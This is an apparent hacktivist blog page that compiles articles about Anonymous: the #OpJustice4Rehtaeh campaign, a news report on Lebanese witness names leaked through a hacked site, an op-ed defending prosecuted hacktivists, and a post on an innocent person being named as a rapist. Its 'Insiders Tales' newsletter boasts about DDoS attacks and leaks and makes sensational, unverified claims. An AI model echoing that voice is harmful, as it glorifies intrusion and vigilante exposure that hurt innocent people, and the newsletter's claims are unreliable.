A Change.org petition by Parsons' mother was heavily circulated, and it hit 100,000 signatures within days. "For the love of God do something", wrote Parsons' father on Wednesday in a personal blogpost addressing the justice minister of Nova Scotia. His words validated #OpJustice4Rehtaeh, launched the day before.
Anonymous' successful leveraging of the press and social media helped them identify the four rapists in just a few hours, which they then threatened to disclose unless their demands were met. No hacking was involved as this time, Anonymous was apparently a friendly tip line.
They were able to get this information so quickly, wrote an Anon on Pastebin, because "dozens of emails were sent to us by kids and adults alike, most of whom had personal relationships with the alleged rapists. Many recalled public confessions made blatantly by these boys in public where they detailed the rape of an inebriated 15-year-old girl." Why this same information was not sent to the police at the time of the investigation over a year ago is not apparent, though Anonymous hinted it sent this information to the Royal Canadian Mounted Police (RCMP) in a more recent release.
Despite a Canadian minister previously telling the media the case was closed and would not be reopened, by Thursday the tune had changed, proving the collective's efforts were not in vain. In addition to submitting new evidence to the RCMP and putting pressure on the Canadian Department of Justice, Anonymous organised a rally outside the Halifax police department on Sunday. Roughly 100 people attended, including Parsons' mother. Speaking on her behalf as her partner, Jason Barnes told Canada's Herald News in an interview, "Leah's been… very happy with the things that Anonymous has done for us and really stepped forward and made this a large enough issue to make people think, and see it." Out of all the operations recently carried out by Anonymous, #OpJustice4Rehtaeh has had an incredibly high "effect real change" rate of just a few days.
Before you scoff at Anonymous expertly using PR and social media to change the world, consider this: Obama's technical team for his re-election campaign in 2012 took measures to DDoS-proof their websites as well as avoid Anonymous' attention at all costs. Anonymous expert and author Gabriella Coleman shared with me a forthcoming report for the Centre for International Governance Innovation which states:
"Anonymous was treated as (potentially) even more of a nuisance than, say, the foreign state hackers who infiltrated the McCain and Obama campaigns in 2008. Had Anonymous successfully accessed servers or DDoS the campaign website, it would likely have ignited colossal media attention and potentially battered the campaign's reputation. Although this alone would likely not put Obama's chances for re-election at risk (the team was confident there was no controversial information to leak), a visit from Anonymous was treated as a real possibility and liability."
Anonymous' core strength lies in its PR tactics, not its boots-on-the-ground protests or actual hacking skills. Besides #OpJustice4Rehtaeh, in the last week Anonymous attacked North Korean social media accounts, then Israeli websites in solidarity with the Palestinians. While both operations apparently caused no substantial impact (North Korea is still a dictatorship, and Israel hasn't changed its stance on Palestine), they were both highly publicised, which is enough of a win for the group now primarily concerned with mobilising activists through the spread of information. If fact, Anonymous has been making headlines on an almost weekly basis for over a year now.
Australian security expert Stilgherrian calls this adoption of multiple causes, going beyond Anonymous's initial defence of internet freedoms, as proof they have become the "Hello Kitty of activism," but Coleman likens Anonymous's current, accepting form to something more organic: a fungus. "They refuse to die and they seem to bud in new places and situations," she explains. "They spore and spread" around the globe because clicktivism is easy and fitting with our already established digital habits.
There isn't enough bleach on the internet to kill the spread, but it looks like we web citizens wouldn't want to even if we had enough chemicals. We've all been infected in one way or another now, and our participation, however small, has evolved the fungus into something more manageable. Regarding the Parsons case, Anonymous is now withholding the names of the minors involved "out of respect for Rehtaeh's mother." The internet's love machine is a more fitting nickname.

Anonymous Operation Bahrain





Anonymous Operation Bahrain








Operation Bahrain Twitter CLICK HERE

Op Comms IRC Channel CLICK HERE

Anonymous Care Package v 2.0 DOWNLOAD HERE

Press Release READ HERE

Operational Information CLICK HERE






Sunday, April 14, 2013

#OpJustice4Rehtaeh demostration in Halifax has started now. LIVE

Share to all ....

Share to all

Anonymous Insiders Tales: April 2013 – Volume 1 Issue 1

So far it has been a pretty busy month for anons. We really overdid ourselves in the last weeks. We start our stories in the Middle East :

#OpIsrael v2.0

A few months ago we made Israel stop firing rockets at Gaza but it appears that they wanted to resume their shenanigans where they left them. Anons said no way, hosay and went to the barricades. Some say we did over 3 millions in damages to Israel cyberspace. But of course Israel is butthurt and say we didn’t do anything.
But seriously, it was the best freaking internet riot ever. It was so massive! Never in the history of hackers so many groups allied for the same goal. An insane 24 hours of tango downs, leaks, counter hacks and failed psyops.

YAN project

@YourAnonNews announced a new project and started to gather funds. They gathered 32 grands as of writing. It pissed TimCast and other anons very much. U MAD BRO???? It’s awesome to see that the people trust us enough to give us all that money. <3

Justice for Rehtaeh Parsons

This is the sad story of another girl who saw her life destroyed by rapists in the small community of Cole Harbour, Nova Scotia. Literally destroyed when she took her own life. Turns out Anonymous does not take kindly to rape and cyberbullying and the collective grabbed its Sherlock Holmes cape. The game was afoot very briefly. They were allegedly able to identify the rapists in 24 hours and told the police they could help.
But the police didn’t like it at all
Police : “If Anonymous want to work with us then they better drop their masks.”
Anons : “If the police want to work with us then they better put on a mask.”
The #lulz!

#OpGabon

There’s really some things you can’t image exist or at least, just you dont want to. Turns out there’s a place in Africa were politicians and cults kill kids to eat them. It’s worst than taxes. And yuck! That’s really gross. We really don’t like yucky things unless they are on \b\.

Biggest twitter storm ever

There’s crappy stuff everywhere but don’t worry, we will fix it! Muslims were getting massacred in Rohingya and nobody dared talking about it. We did. And we broke the most hugenormous twitterstorm ever!
It’s been said : Anonymous taught twitter about the Rohingya genocide. Over 100,000 mentions in 24 hours (graph). Are we bad ass or what !?
People started to ask the Dalai Lama for peace. But X came and told everyone to shut up since he’s a know-it-all Buddhist masta.

AnonRelations drama

Anons always live up to their drama queens reputation and it turns out AnonRelations.net put up a pretty good act. Malice got really pissed off and stirred a massive shitstorm. Sage went all rage quit “YAAAAARRRRR!!!”. Therefore AnonRelations was pronounced dead only to come back to life two weeks later. Zombie movies have nothing on us.
Bravo! Amazing acting guys….mmmmmm

IRC Quote of the Week

<dmzpkts> Change only happens at the barrel of a gun.. but no one ever said, that the gun cant be a digital one.

And also

/b/ cats
Don’t forget! Internet is serious biz. Serious serious…

Get Anonymous Insiders tales each week!

Hackers Post Witness List in Trial on Ex-Premier’s Death

PARIS — Hackers broke into a major Lebanese news Web site and plastered the front page with the names of the so-called secret witnesses for the trial in the killing of the former Prime Minister Rafik Hariri in an apparent bold, new move to intimidate witnesses and derail the trial.

The hacking of the Beirut newspaper last week came on the heels of an earlier publication by another Lebanese newspaper that named 32 witnesses in the trial, which is planned to begin this year. Progress in the case at the United Nations-backed Special Tribunal for Lebanon has been delayed for years by blocked investigations in Beirut, the killing of a Lebanese investigator, the near-killing of another and the court’s bureaucracy.
A spokesman for the tribunal denounced the hacking operation, warning that the authors were endangering the lives of Lebanese citizens. “It is part of the continuing campaign to undermine the tribunal and intimidating all of the witnesses,” the spokesman, Marten Youssef, said Friday.
International criminal tribunals have been confronted by threats to witnesses and the disclosure of confidential materials before, and a number of lawyers and journalists have been prosecuted for contempt of court. But until now, international courts have not faced a cyberattack of this scale, according to lawyers in The Hague.
The hackers broke into the Web site of the newspaper Al Mustaqbal and listed personal data for 167 Lebanese men, including their names, passport pictures, their places and years of birth, cities of residence and professions. The text in Arabic and English said that the information about the witnesses was leaked by the tribunal.
Mr. Youssef said that the list published by the hackers was not “an accurate reflection of the official court records,” but he gave no further details.
What has unfolded is an opaque story full of twists that is now under investigation by the tribunal, the attorney general of Lebanon and the police in the Netherlands, where the tribunal is based.
It began Tuesday morning when the newspaper Al Mustaqbal discovered that the front page of its Web site had been taken over by the purported secret witness list, causing much consternation in a small country where many people know one another.
The newspaper was owned by Mr. Hariri and still belongs largely to his family.
The hackers also directed visitors to a Web site called “Journalists for the Truth,” lawyers said.
“We are a group of journalists seeking to unveil corruption in the Special Tribunal for Lebanon,” the Web site said, adding that it aimed to prove “bribery” and “prejudice and non-professionalism” of court officials. It also said its mission was to provide legal support to the witnesses “who face daily temptation or pressure” from tribunal staff.
In what seemed a surreal spin on a Web site that was itself simultaneously publishing the so-called witness list, the site blamed court officials for leaking the confidential information and said that this was an act that “posed a threat to the lives of many witnesses.”
The Journalists for the Truth site revealed no names or news media affiliation, only an e-mail address. The Dutch police said they had traced the Web site to a registry in the Netherlands, but they said its owners were still unknown.
A Lebanese lawyer familiar with the case who spoke on the condition of anonymity said he believed the hackers were supporters of the militant movement Hezbollah, which has long campaigned against the court.
The Hezbollah leadership has consistently denied any connection with the Hariri killing and has said it would not cooperate with the tribunal. The tribunal has charged four Hezbollah members in connection with the bombing of Mr. Hariri’s car as it drove down a seaside boulevard in Beirut in 2005. The location of the four is unknown, and they would be tried in absentia.
Hezbollah officials could not be reached for comment, but the group has previously denied any involvement in the bombing and denounced the tribunal as a tool of the United States and Israel.
In Paris last week, Saad Hariri, the dead prime minister’s son, who has also served as prime minister, called the hacking and the publication of the possible witnesses in his father’s case “a criminal act.” He insisted that the tribunal would continue its work and reveal who killed his father and a number of his supporters.
For the tribunal, which faces opposition in Lebanon from Hezbollah and its supporters, the listing of names and photographs is a second major setback this year.
In January, the newspaper Al Akhbar, which is close to Hezbollah, published similar “confidential” lists, revealing pictures and personal details of 32 people it said were witnesses in the case. But the newspaper stopped after it received a warning from Lebanon’s attorney general that it was violating judges’ orders of confidentiality.
Mr. Youssef, the tribunal spokesman, said the prosecution had prepared a still undisclosed list of 500 potential witnesses. But he declined to say whether the published names were among them. “As a court, we are obviously concerned about the safety of legitimate witnesses,” he said, “they are among the most important component of the trial.”
Mr. Youssef added that the anonymous “journalists’ group” was not credible. “Let them reveal their identity, and we will engage with any critics,” he said.
A lawyer in The Hague, familiar with the tribunal’s work, called the listing of names an astonishing maneuver. “Without firing a shot or beating up anyone,” he said, “they’ll manage to scare away all the witnesses.”

Hacktivists as Gadflies

Around 400 B.C., Socrates was brought to trial on charges of corrupting the youth of Athens and “impiety.” Presumably, however, people believed then as we do now, that Socrates’ real crime was being too clever and, not insignificantly, a royal pain to those in power or, as Plato put it, a gadfly. Just as a gadfly is an insect that could sting a horse and prod it into action, so too could Socrates sting the state. He challenged the moral values of his contemporaries and refused to go along with unjust demands of tyrants, often obstructing their plans when he could. Socrates thought his service to Athens should have earned him free dinners for life. He was given a cup of hemlock instead.
The government is treating hackers who try to make a political point as serious threats.
We have had gadflies among us ever since, but one contemporary breed in particular has come in for a rough time of late: the “hacktivist.” While none have yet been forced to drink hemlock, the state has come down on them with remarkable force. This is in large measure evidence of how poignant, and troubling, their message has been.
Hacktivists, roughly speaking, are individuals who redeploy and repurpose technology for social causes. In this sense they are different from garden-variety hackers out to enrich only themselves. People like Steve Jobs, Steve Wozniak and Bill Gates began their careers as hackers — they repurposed technology, but without any particular political agenda. In the case of Mr. Jobs and Mr. Wozniak, they built and sold “blue boxes,” devices that allowed users to defraud the phone company. Today, of course, these people are establishment heroes, and the contrast between their almost exalted state and the scorn being heaped upon hacktivists is instructive.
Brecht Vandenbroucke
For some reason, it seems that the government considers hackers who are out to line their pockets less of a threat than those who are trying to make a political point. Consider the case of Andrew Auernheimer, better known as “Weev.” When Weev discovered in 2010 that AT&T had left private information about its customers vulnerable on the Internet, he and a colleague wrote a script to access it. Technically, he did not “hack” anything; he merely executed a simple version of what Google Web crawlers do every second of every day — sequentially walk through public URLs and extract the content. When he got the information (the e-mail addresses of 114,000 iPad users, including Mayor Michael Bloomberg and Rahm Emanuel, then the White House chief of staff), Weev did not try to profit from it; he notified the blog Gawker of the security hole.
For this service Weev might have asked for free dinners for life, but instead he was recently sentenced to 41 months in prison and ordered to pay a fine of more than $73,000 in damages to AT&T to cover the cost of notifying its customers of its own security failure.
When the federal judge Susan Wigenton sentenced Weev on March 18, she described him with prose that could have been lifted from the prosecutor Meletus in Plato’s “Apology.” “You consider yourself a hero of sorts,” she said, and noted that Weev’s “special skills” in computer coding called for a more draconian sentence. I was reminded of a line from an essay written in 1986 by a hacker called the Mentor: “My crime is that of outsmarting you, something that you will never forgive me for.”
When offered the chance to speak, Weev, like Socrates, did not back down: “I don’t come here today to ask for forgiveness. I’m here to tell this court, if it has any foresight at all, that it should be thinking about what it can do to make amends to me for the harm and the violence that has been inflicted upon my life.”
He then went on to heap scorn upon the law being used to put him away — the Computer Fraud and Abuse Act, the same law that prosecutors used to go after the 26-year-old Internet activist Aaron Swartz, who committed suicide in January.
The law, as interpreted by the prosecutors, makes it a felony to use a computer system for “unintended” applications, or even violate a terms-of-service agreement. That would theoretically make a felon out of anyone who lied about their age or weight on Match.com.
The case of Weev is not an isolated one. Barrett Brown, a journalist who had achieved some level of notoriety as the “the former unofficial not-spokesman for Anonymous,” the hacktivist group, now sits in federal custody in Texas. Mr. Brown came under the scrutiny of the authorities when he began poring over documents that had been released in the hack of two private security companies, HBGary Federal and Stratfor. Mr. Brown did not take part in the hacks, but he did become obsessed with the contents that emerged from them — in particular the extracted documents showed that private security contractors were being hired by the United States government to develop strategies for undermining protesters and journalists, including Glenn Greenwald, a columnist for Salon. Since the cache was enormous, Mr. Brown thought he might crowdsource the effort and copied and pasted the URL from an Anonymous chat server to a Web site called Project PM, which was under his control.
Related
Read previous contributions to this series.
Just to be clear, what Mr. Brown did was repost the URL from a Web site that was publicly available on the Internet. Because Stratfor had not encrypted the credit card information of its clients, the information in the cache included credit card numbers and validation numbers. Mr. Brown didn’t extract the numbers or highlight them; he merely offered a link to the database. For this he was charged on 12 counts, all of which pertained to credit card fraud. The charges against him add up to about 100 years in federal prison. It was “virtually impossible,” Mr. Greenwald, wrote recently in The Guardian, his new employer, “to conclude that the obscenely excessive prosecution he now faces is unrelated to that journalism and his related activism.”
Other hacktivists have felt the force of the United States government in recent months, and all reflect an alarming contrast between the severity of the punishment and the flimsiness of the actual charges. The case of Aaron Swartz has been well documented. Jeremy Hammond, who reportedly played a direct role in the Stratfor and HBGary hacks, has been in jail for more than a year awaiting trial. Mercedes Haefer, a journalism student at the University of Nevada, Las Vegas, faces charges for hosting an Internet Relay Chat channel where an Anonymous denial of service attack was planned. Most recently, Matthew Keys, a 26-year-old social-media editor at Reuters, who allegedly assisted hackers associated with Anonymous (who reportedly then made a prank change to a Los Angeles Times headline), was indicted on federal charges that could result in more than $750,000 in fines and prison time, inciting a new outcry against the law and its overly harsh enforcement. The list goes on.
In a world in which nearly everyone is technically a felon, we rely on the good judgment of prosecutors to decide who should be targets and how hard the law should come down on them. We have thus entered a legal reality not so different from that faced by Socrates when the Thirty Tyrants ruled Athens, and it is a dangerous one. When everyone is guilty of something, those most harshly prosecuted tend to be the ones that are challenging the established order, poking fun at the authorities, speaking truth to power — in other words, the gadflies of our society.

ANONYMOUS SCREWS UP, NAMES INNOCENT PERSON AS PART OF RAPE GANG IN NEW CASE

A short while back, an article about a teenaged girl who was raped and had a photo of the rape in progress posted on the internet by one of the rapists who bragged about it. The teen attempted to commit suicide and had been on life support since 2011 until she was recently removed from life support and passed away

http://mashable.com/2013/04/11/father-suicide-victim/

rehSomehow, Anonymous got involved and started #OpJustice4Rehtaeh with the intent of getting justice for Rehtaeh.

rcmp

The charges of law enforcement, in this case the RCMP along with local law enforcement, either screwed the case up or covered up began to surface. A peace rally scheduled for Sunday, April 14th was announced and soon Anonymous was posting Pastebin messages about this new OP.

Then comes their big screw up. They named someone as part of the gang rape who is completely innocent.

oops2

Things soon got out of control as many on the internet who have been following the case and Anonymous’s part in it started spreading the name around and “researching” him.

It has reached the point where the mother of the deceased girl has asked Anonymous to quit naming suspects.

oops1

Good intentions or not, this is why Anonymous should butt out of making all these OPS and barging into these high profile cases. Once again they have put the safety and security of innocent victims at risk. They have done more damage then good.

Editors note: There seems to be a debate regarding who it was that disclosed the name of the innocent victim. A number of people are stating that Anonymous did not directly name the individual.

http://www.telegraph.co.uk/news/worldnews/northamerica/canada/9987383/Anonymous-we-will-name-rapists-of-suicide-victim-Rehtaeh-Parsons.html

In the article is this quote:

In”In a video statement, Anonymous said it had already identified two of the alleged attackers and were “currently confirming a third”. The group said it was “only a matter of time” before they found the fourth.”

I may have misread the article and was under the impression that Anonymous had made these two names public. The problem remains, however, that Anonymous has created a vigilante atmosphere regarding the case and the name of an innocent victim had been made public and is now all over the internet.

There is also this excerpt to take into consideration in regards to Anonymous barging into this case:

“Justice Minister Ross Landry, who reportedly met with Rehtaeh’s mother yesterday, condemned the threats, saying: “Leah [Parsons] said she didn’t want harm to come to the other young people, that her daughter would not have wanted that.”

It is clear from that excerpt that the mother does not approve of Anonymous’s actions.

Only time will tell how badly innocent lives will be destroyed once again by this reckless and haphazard group.

Stay tuned

Like Us Anonops Anonimo


Twitter Delicious Facebook Digg Stumbleupon Favorites More

 
Design by http://www.thepiratesoft.org/ | Bloggerized by Lasantha - Premium Blogger Themes | Hack